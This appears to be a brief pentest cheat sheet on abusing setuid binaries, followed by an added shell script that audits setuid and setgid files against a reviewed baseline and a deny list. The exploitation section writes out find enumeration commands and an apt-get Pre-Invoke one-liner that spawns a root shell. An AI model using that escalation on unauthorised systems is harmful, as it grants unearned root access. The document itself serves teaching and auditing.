Special Permissions

SetUID

Sample Exploitation

  1. Find root-owned files that have the setuid bit set

    $ find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

  2. Find root-owned files that have the setgid bit set

    $ find / -user root -perm -2000 -exec ls -ldb {} \; 2>/dev/null

  3. Look the binary up on GTFOBins, or reverse engineer it, find a vulnerability and exploit it. Assuming apt-get has setuid

    $ sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
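
The same find tests used as a recurring audit, as an added example that is not part of the original page: it lists every setuid/setgid file under a directory and reports the ones that are not in a reviewed baseline. The function names, the baseline file format (one absolute path per line) and the DENY_NAMES list are assumptions made for this example.

```shell
#!/bin/sh
# Added example: audit setuid/setgid files against a reviewed baseline.
# Assumptions: baseline file = one absolute path per line; DENY_NAMES holds
# basenames that should never carry these bits (apt-get, taken from the page).
DENY_NAMES="${DENY_NAMES:-apt-get}"

# list_special_bits ROOT -> "kind<TAB>path" for each regular file that has
# the setuid and/or setgid bit. -xdev stays on one filesystem (run per mount).
list_special_bits() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    sort |
    while IFS= read -r f; do
        kind=""
        [ -u "$f" ] && kind="suid"
        [ -g "$f" ] && kind="${kind:+$kind+}sgid"
        printf '%s\t%s\n' "$kind" "$f"
    done
}

# audit_special_bits ROOT BASELINE -> findings only, one per line:
#   DANGEROUS   basename is in DENY_NAMES (reported even if it is baselined)
#   UNREVIEWED  path is absent from the baseline
audit_special_bits() {
    tab=$(printf '\t')
    list_special_bits "$1" | while IFS="$tab" read -r kind path; do
        case " $DENY_NAMES " in
            *" ${path##*/} "*) tag=DANGEROUS ;;
            *) if grep -Fxq -- "$path" "$2"; then continue; fi
               tag=UNREVIEWED ;;
        esac
        printf '%s\t%s\t%s\n' "$tag" "$kind" "$path"
    done
}
```

Run it as root so find can read every directory, and treat any output line as something to review: either remove the bit with chmod u-s / g-s or add the path to the baseline after checking it.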
